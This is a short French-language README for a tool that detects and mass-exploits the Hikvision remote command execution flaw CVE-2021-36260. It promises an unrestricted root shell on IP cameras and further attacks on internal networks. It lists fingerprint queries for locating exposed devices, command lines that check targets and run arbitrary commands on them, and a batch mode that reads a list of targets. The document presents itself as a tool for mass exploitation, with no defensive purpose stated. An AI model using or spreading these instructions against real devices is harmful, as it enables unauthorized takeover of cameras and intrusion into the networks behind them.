
Outil de détection et d'exploitation en masse de la vulnérabilité RCE Hikvision
Un attaquant peut utiliser cette vulnérabilité pour prendre complètement le contrôle de l'appareil via un shell root sans restriction, même si le propriétaire de l'appareil est limité à un shell protégé restreint (psh). En plus de compromettre les caméras IP, il peut également accéder et attaquer le réseau interne.
header="Hikvision"
app="HIKVISION-视频监控"
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --check
python ./CVE-2021-36260.py -u http://192.168.1.1:8080 --cmd "ls -la"
python ./CVE-2021-36260.py -f target.txt
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Start scanning url
-f FILE, --file FILE read the url from the file
--check Check if vulnerable
--cmd CMD execute cmd (i.e: "ls -l")
Peut être utilisé pour l'exploitation par lots de src.